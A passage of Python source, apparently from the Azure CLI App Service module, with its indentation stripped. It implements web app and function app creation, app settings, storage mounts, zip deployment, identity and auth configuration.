elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# Be consistent with portal: any windows webapp should have this even if it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', with no app-setting update commands in between
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
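# Container webapps accept exactly one of: --runtime, --deployment-container-image-name,
# or the --multicontainer-config-type/--multicontainer-config-file pair (which
# must be supplied together).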
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # exactly one of these options may be specified
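# Extracts the registry host from a fully-qualified image name, e.g.
# 'myregistry.azurecr.io/nginx:latest' -> 'myregistry.azurecr.io'; returns None
# for bare Docker Hub images such as 'nginx', where no registry URL is present.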
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry fetching the plan because, when the plan is created as part of the function app,
# it can take a few attempts before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
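# Dispatches to the slot-specific SDK operation ('<operation_name>_slot') on
# client.web_apps when a slot is given, otherwise to the production-site
# operation of the same name.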
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption plan and an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
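# Polls the Kudu /api/settings endpoint with basic-auth publishing credentials;
# the retryable_method decorator re-attempts the request (its arguments are
# presumably the attempt count and delay in seconds), since freshly updated app
# settings can take a moment to reach the SCM site.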
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': UA_AGENT
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
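# Builds the fx-version string stored in site config, e.g. 'nginx' ->
# 'DOCKER|nginx', or a base64-encoded compose file with type 'COMPOSE' ->
# 'COMPOSE|<encoded>'; a blank image name collapses to a single space so the
# existing value gets cleared.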
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
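# Multi-container configs are stored in linux_fx_version as
# '<config-type>|<base64-encoded config file>'; the helpers below decode that
# value back to bytes and encode a local file or URL into the same base64 form.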
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Base64-encode the file contents and return the result as a string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
